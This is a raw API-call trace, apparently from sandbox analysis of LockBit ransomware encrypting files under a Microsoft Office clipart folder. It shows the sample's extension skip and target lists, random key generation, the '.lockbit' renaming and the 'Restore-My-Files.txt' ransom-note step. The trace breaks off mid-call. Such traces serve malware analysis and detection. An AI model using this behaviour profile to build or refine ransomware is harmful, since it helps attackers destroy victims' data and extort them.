lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0144.350] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0144.351] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0144.351] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG.lockbit") returned 72 [0144.351] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149018.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.356] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.356] malloc (_Size=0x40068) returned 0x3df0008 [0144.356] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27393) returned 1 [0144.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.358] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0144.363] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.364] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.364] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0144.364] free (_Block=0x1fa2ed8) [0144.364] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149018.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.364] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.364] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.364] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f27470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xfd22, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0149118.JPG", cAlternateFileName="")) returned 1 [0144.364] lstrcmpiW (lpString1=".", lpString2="J0149118.JPG") returned -1 [0144.364] lstrcmpiW (lpString1="..", lpString2="J0149118.JPG") returned -1 [0144.364] PathFindExtensionW (pszPath="J0149118.JPG") returned=".JPG" [0144.364] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0144.364] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0144.364] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0144.364] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0144.364] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0144.364] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0144.364] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0144.364] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0144.364] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0144.364] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0144.364] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0144.365] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0144.365] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0144.366] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0144.366] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0144.366] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0144.366] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0149118.JPG") returned 1 [0144.366] lstrcmpiW (lpString1="ntldr", lpString2="J0149118.JPG") returned 1 [0144.366] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0149118.JPG") returned 1 [0144.366] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0149118.JPG") returned -1 [0144.366] lstrcmpiW (lpString1="autorun.inf", lpString2="J0149118.JPG") returned -1 [0144.366] lstrcmpiW (lpString1="thumbs.db", lpString2="J0149118.JPG") returned 1 [0144.366] lstrcmpiW (lpString1="iconcache.db", lpString2="J0149118.JPG") returned -1 [0144.366] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.366] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG") returned=".JPG" [0144.366] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0144.366] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0144.366] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0144.366] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0144.367] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0144.367] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0144.367] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0144.367] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0144.367] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0144.367] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0144.367] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0144.367] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0144.367] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG.lockbit") returned 72 [0144.367] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0149118.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.369] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.369] malloc (_Size=0x40068) returned 0x3df0008 [0144.369] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=64802) returned 1 [0144.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.370] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.376] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.376] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.376] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.379] free (_Block=0x1fa2ed8) [0144.379] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0149118.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.379] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.379] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.379] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb544, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0150150.WMF", cAlternateFileName="")) returned 1 [0144.379] lstrcmpiW (lpString1=".", lpString2="J0150150.WMF") returned -1 [0144.379] lstrcmpiW (lpString1="..", lpString2="J0150150.WMF") returned -1 [0144.379] PathFindExtensionW (pszPath="J0150150.WMF") returned=".WMF" [0144.379] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.379] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.379] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.379] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.379] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.379] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.379] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.380] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.380] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0150150.WMF") returned 1 [0144.381] lstrcmpiW (lpString1="ntldr", lpString2="J0150150.WMF") returned 1 [0144.381] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0150150.WMF") returned 1 [0144.381] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0150150.WMF") returned -1 [0144.381] lstrcmpiW (lpString1="autorun.inf", lpString2="J0150150.WMF") returned -1 [0144.381] lstrcmpiW (lpString1="thumbs.db", lpString2="J0150150.WMF") returned 1 [0144.381] lstrcmpiW (lpString1="iconcache.db", lpString2="J0150150.WMF") returned -1 [0144.381] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.381] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF") returned=".WMF" [0144.381] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.382] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.382] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.383] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.383] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF.lockbit") returned 72 [0144.383] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150150.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.384] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.384] malloc (_Size=0x40068) returned 0x3df0008 [0144.384] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=46404) returned 1 [0144.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.385] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.385] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.385] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.390] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.390] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.391] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.393] free (_Block=0x1fa2ed8) [0144.393] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150150.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.393] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.393] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.393] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x212e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0150861.WMF", cAlternateFileName="")) returned 1 [0144.393] lstrcmpiW (lpString1=".", lpString2="J0150861.WMF") returned -1 [0144.393] lstrcmpiW (lpString1="..", lpString2="J0150861.WMF") returned -1 [0144.393] PathFindExtensionW (pszPath="J0150861.WMF") returned=".WMF" [0144.393] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".icns", 